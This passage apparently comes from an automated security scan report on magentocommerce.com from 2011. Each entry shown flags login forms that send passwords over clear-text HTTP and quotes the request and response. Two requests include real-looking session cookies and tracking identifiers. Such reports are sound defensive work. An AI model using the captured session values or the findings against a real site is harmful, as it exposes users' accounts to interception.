Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175743; expires=Sat, 11-Aug-2012 15:02:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fproduct%2Fmagento-zend%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:23 GMT
Content-Length: 34344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.124. http://www.magentocommerce.com/product/mobile  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/mobile

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/mobile HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175711; expires=Sat, 11-Aug-2012 15:01:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fproduct%2Fmobile%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:52 GMT
Content-Length: 108871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.125. http://www.magentocommerce.com/product/professional-edition  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /product/professional-edition

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /product/professional-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:01:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175663; expires=Sat, 11-Aug-2012 15:01:03 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproduct%2Fprofessional-edition%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:01:03 GMT
Content-Length: 40267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.126. http://www.magentocommerce.com/pt_BR  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /pt_BR

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /pt_BR HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176586; expires=Sat, 11-Aug-2012 15:16:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fpt_BR%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:27 GMT
Content-Length: 109441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.127. http://www.magentocommerce.com/roadmap/issue-roadmap  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /roadmap/issue-roadmap

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /roadmap/issue-roadmap HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176444; expires=Sat, 11-Aug-2012 15:14:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Froadmap%2Fissue-roadmap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 34644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.128. http://www.magentocommerce.com/ru  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ru

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /ru HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176501; expires=Sat, 11-Aug-2012 15:15:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fru%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 69663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.129. http://www.magentocommerce.com/services  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.130. http://www.magentocommerce.com/services/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fservices%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:12 GMT
Content-Length: 36548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.131. http://www.magentocommerce.com/services/course-pricing  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-pricing

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/course-pricing HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175747; expires=Sat, 11-Aug-2012 15:02:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fservices%2Fcourse-pricing%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:27 GMT
Content-Length: 35078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.132. http://www.magentocommerce.com/services/course-schedule  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-schedule

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/course-schedule HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175751; expires=Sat, 11-Aug-2012 15:02:31 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fservices%2Fcourse-schedule%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:31 GMT
Content-Length: 49762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.133. http://www.magentocommerce.com/services/descriptions  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/descriptions

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/descriptions HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/training
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170926; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.6.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171049; expires=Sat, 11-Aug-2012 13:44:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:09 GMT
Content-Length: 57276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.134. http://www.magentocommerce.com/services/professional-services  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/professional-services

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/professional-services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175764; expires=Sat, 11-Aug-2012 15:02:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fprofessional-services%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:45 GMT
Content-Length: 35091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.135. http://www.magentocommerce.com/services/register-for-training  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/register-for-training

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/register-for-training HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fregister-for-training%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:13 GMT
Content-Length: 41049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.136. http://www.magentocommerce.com/services/testimonials  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/testimonials

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/testimonials HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175741; expires=Sat, 11-Aug-2012 15:02:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Ftestimonials%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:21 GMT
Content-Length: 36222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.137. http://www.magentocommerce.com/services/training  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/training

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /services/training HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/screencasts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
